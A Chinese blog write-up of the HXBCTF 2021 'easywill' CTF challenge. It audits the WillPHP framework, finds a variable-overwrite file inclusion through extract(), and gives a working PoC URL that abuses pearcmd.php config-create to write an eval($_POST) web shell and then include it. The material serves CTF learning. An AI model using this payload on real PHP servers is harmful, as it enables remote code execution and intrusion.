[HXBCTF 2021]湖湘杯easywill

最新推荐文章于 2024-04-04 14:32:27 发布
最新推荐文章于 2024-04-04 14:32:27 发布
阅读量3.6k 收藏 3
点赞数 2
分类专栏: ctf 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/121628030
版权

INDEX

0x00 前言

这次接触到pear有点陌生
先本地弄弄

敏感利用点
install && config-create

啥是Pear?

pear (全称为PHP扩展与应用库)
1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。

2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少出错的几率。

3.PEAR通过提供2个类为你搭建了一个框架,实现了诸如析构函数,错误捕获功能,你通过继承就可以使用这些功能。

没有环境手装一下

wget http://pear.php.net/go-pear.phar
php go-pear.phar

一定注意php.ini中register_argc_argv的开启!

pear installl

pear install -R 下载后存放的目录 下载源

-R DIR, --installroot=DIR
root directory used when installing files (ala PHP’s INSTALL_ROOT), use packagingroot for RPM

在这里插入图片描述
在这里插入图片描述

pear config-create

config-create <root path> <filename>
讲真一开始我都没明白咋用
薅了一下源码 发现了几个有意思的地方
在这里插入图片描述
这句话我属实不太会断句了…(原谅我的英文)
我感觉bing的翻译还算靠谱
在这里插入图片描述
大致就是变量设置为<root path>的子目录并保存在<filename>中
在这里插入图片描述
由此处还可以看出 <root path>还需要以 / 开头
大致明白了怎么用之后实操一下
明显看到 <root path> 是作为父级目录的
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
success

关于pearcmd.php 和 register_argc_argv

薅一下pearcmd.php
可以看出通过argv用作command参数
跟进一下readPHPArgv
在这里插入图片描述
在这里插入图片描述
明显可以看到获取argv的逻辑
//Getopt.php
$_SERVER[‘argv’]我们可以通过query string控制
详见下面

    public static function readPHPArgv()
    {
        global $argv;
        if (!is_array($argv)) {
            if (!@is_array($_SERVER['argv'])) {
                if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                    $msg = "Could not read cmd args (register_argc_argv=Off?)";
                    return PEAR::raiseError("Console_Getopt: " . $msg);
                }
                return $GLOBALS['HTTP_SERVER_VARS']['argv'];
            }
            return $_SERVER['argv'];
        }
        return $argv;
    }

}

register_argc_argv

php.ini中的配置项
在这里插入图片描述
官方文档对于$argv变量的解释
(cli模式)

$argv
$argv — 传递给脚本的参数数组

说明 ¶ 包含当运行于命令行下时传递给当前脚本的参数的数组。

注意: 第一个参数总是当前脚本的文件名,因此 $argv[0] 就是脚本文件名。

注意: 这个变量仅在 register_argc_argv 打开时可用。

范例 ¶ 示例 #1 $argv 范例

<?php var_dump($argv); ?> 当使用这个命令执行:php script.php arg1 arg2 arg3

以上例程的输出类似于:

array(4) { [0]=> string(10) “script.php” [1]=> string(4)
“arg1” [2]=> string(4) “arg2” [3]=> string(4) “arg3” }

在web环境下

‘argv’
传递给该脚本的参数的数组。当脚本以命令行方式运行时,argv 变量传递给程序 C 语言样式的命令行参数。当通过 GET 方式调用时,该变量包含query string。

eg:

<?php
var_dump($_SERVER['argv']);
var_dump($argv);

在这里插入图片描述
后来看到文章里说用+号分隔变量
在这里插入图片描述

fine
冗长の铺垫粽算结束叻

参考文章

https://longlone.top/%E5%AE%89%E5%85%A8/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/register_argc_argv%E4%B8%8Einclude%E9%99%90%E5%88%B6php%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E7%9A%84%E5%B0%8F%E7%BB%93/

0x01 开日

<?php
namespace home\controller;
class IndexController{
    public function index(){
        highlight_file(__FILE__);
        assign($_GET['name'],$_GET['value']);
        return view();
    }
}

直接跟进assign

//willphp/helper.php

function assign($name, $value = null) {
	\wiphp\View::assign($name, $value);
}

//willphp/wiphp/View.php

public static function assign($name, $value = null) {
		if ($name != '') self::$vars[$name] = $value;
	}

再看view

//willphp/helper.php

function view($file = '', $vars = []) {
	return \wiphp\View::fetch($file, $vars);
}

//willphp/wiphp/View.php

public static function fetch($file = '', $vars = []) {
		if (!empty($vars)) self::$vars = array_merge(self::$vars, $vars);	//数组合并
		$viewfile = self::getViewFile($file);
		if (file_exists($viewfile)) {
			array_walk_recursive(self::$vars, 'self::parseVars'); //处理输出
			define('__RUNTIME__', round((microtime(true) - START_TIME) , 4));	
			Template::render($viewfile, self::$vars);
		} else {
			App::halt($file.' 模板文件不存在。');
		}
	}

跟进render
//willphp/wiphp/Template.php

public static function renderTo($viewfile, $vars = []) {
		$m = strtolower(__MODULE__);
		$cfile = 'view-'.$m.'_'.basename($viewfile).'.php';
		if (basename($viewfile) == 'jump.html') {
			$cfile = 'view-jump.html.php';
		}
		$cfile = PATH_VIEWC.'/'.$cfile;
		if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($viewfile)) {
			$strs = self::compile(file_get_contents($viewfile), $vars);
			file_put_contents($cfile, $strs);
		}
		extract($vars);
		include $cfile;
	}

extract($vars);
include $cfile;
此处存在变量覆盖,可进行文件包含
so
name=cfile & value=xxx(我们想要包含的文件) 即可形成文件包含漏洞
test -> success
在这里插入图片描述
由前言中的铺垫
我们此处可以利用pearcmd进行shell写入
poc

/?name=cfile&value=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[a]);?>+/tmp/shell.php

看到成功写入了
在这里插入图片描述
后面我们只需包含我们刚刚写的shell即可
done!
在这里插入图片描述

参考师傅

https://blog.csdn.net/rfrder/article/details/121042290

0x02 rethink

刚知道vs可以动调
静态一步步看也确实累…(但不失为锻炼审计能力的机会)
这篇wp断断续续写了几天…
学习到新知识点包含pearcmd写shell
讲真第一次看师傅们wp的时候我觉得poc的结构真的好奇怪 有/ 有+ 一开始都不是特别能理解
Anyway,静下心一步步去复盘,梳理清楚,早日上岸当菜鸡
一题多解下次一定⑧!

k_du1t
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 649
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
CTF 湖湘 决赛 2021 final.zip
12-07
CTF 湖湘 决赛 2021 final
[HXBCTF 2021]easywill
weixin_43610673的博客
11-17 990
这题index上给的代码很短,需要下载框架源码,自行修改审计。我没找到2.1.5的源码,下了个最新的。这题比赛的时候看了到assign函数还以为是个模板注入的题以为要爆破模板变量名就没去整了。还是对调试这种不太熟吧,下意识不想审计框架的函数调用 下面开始审计,修改app/controller/IndexController.php 的内容与题目给出的一致 先跟踪assign函数 assign只是做一个赋值的作用 传递给view当中 再看view函数 可以看到存在..
[湖湘 2021 final]Penetratable
最新发布
2301_80552914的博客
04-04 671
链子:FileViewer -> Backdoor::__destruct() -> FileViewer::__call() -> FileViewer::loadfile() -> FileViewer::curl()链子:aa::_destruct->zz::_tostring->mothod=write&var=content->zz::write()->ff::_get->func=system->xx::_call。可以用admin身份了,但是只能查看用户信息。注册一个admin"#的用户。
[每日一题][HXBCTF 2021]easywill
Sapphire037的博客
11-17 672
笔记 打开页面得到 <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 然后显示的是一个WillPHP,还以为是恶搞(我没文化),一查真有这东西,页面给了个函数as
HXBCTF 2021 easywill
m0_64348326的博客
09-04 180
14.操蛋的是这里明显,大小写被转义了,后面才知道需要自己手动修改一下,否则在url框中会被自动转义再发送。为模板开发的一款超轻量级的MVC框架,其中一共源码大小不超过400k,没有繁琐的类库以及冗余的功能函数。同样是两个if不成立,进入最后的变量覆盖加文件包含,这个覆盖的键值对参数。获取到传递参数的md5值文件名,并进行判断是否存在,不成立,跳到else。审计一下,两个参数都为空,那么它就会包含默认的route,就是。函数的作用,它一般是各种框架自定义的一个方法,而大概的用途和。
2021湖湘easy&&深育WEBLog
Love&Share
11-14 1333
文章目录湖湘easy深育WEBLog 湖湘easy <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 题目页面最下边有powered by willphp.
2021第七届湖湘-web-wp
midi
11-15 4176
第七届湖湘-web-wpWeb1 easywillWeb2 Pentest in Autumn Web1 easywill 题目给的附件Pom.xml Pom.xml 中有actuator http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下) 由于没有权限,接下来访问都是302 http://eci-2zedwevdy
2021湖湘wp_web
meteox的博客
11-15 4177
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4905
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
php register_argc_argv,命令行参数wmain (int argc,wchar_t *argv[])
weixin_30139213的博客
03-21 446
命令参数,总是把我搞得头晕,这回决定把它一次弄清启动程序时,系统会在传入命令行参数给程序比如下面,ipconfig /all显示完整网络配置信息。%windir%\system32\rundll32.exe powrprof.dll,SetSuspendState这个在启用休眠的电脑上运行,立即进入休眠同样shutdown /h也能休眠....如下图所示ttt是程序名,它和它后面的东西一起在启动程...
ctfshow 萌新22 (类似级客巅峰web4)
Firebasky的博客
10-07 3256
在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~? 下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助 一. 源代码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2480
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1286
PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
php argc argv,在PHP中检测register_argc_argv
weixin_39596090的博客
03-09 547
Spacedust2phpphpinfo我需要检查我的PHP应用程序安装程序中是否启用了register_argc_argv.我写了一个代码,但它不起作用.它总是说它已被禁用,而它已在php.ini中启用://register_argc_argvecho "";$ok=0;$val="Disabled";if(key_exists('PHP Core', $phpinfo)){if(key_exi...
[湖湘 2021 final]Penetratable-----记suid提权
qq_73767109的博客
06-24 307
于是可以根据这个发包对里面的data改写成root的,这要登录在admin下进行修改,因为root没有权限哪只能是admin有。sed命令来自英文词组“stream editor”的缩写,其功能是用于利用语法/脚本对文本文件进行批量的编辑操作。可以看到有目录泄露,经过读取有static里可以看到有用信息其他的都说php文件读取后没有回显。但是用同样的方式发现不能对root进行修改密码导致不能登录root。这样意思是在admin下修改root的密码,这里修改为root。登录后暂时没有发现什么有用的信息。
[HFCTF 2021 Final]easyflask
weixin_43610673的博客
06-20 1631
任意文件读取,根据提示读取源码 #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type('User', (object,), { 'uname'
[NEWSCTF 2021]easy_web 和 签到
fightte的博客
06-04 653
~ [NEWSCTF 2021]easy_web 和 签到 ~ 之前打了萌新,然后就是这样, 题目的质量很高,也得到了很多新的经验 也得到了新的知识,题目是新奇的。 [newsCTF 2021] easy_web 界面: 进入: 就这么多源码: <?php highlight_file("index.php") ?> </div> <div class="content"> <?php
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1631
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值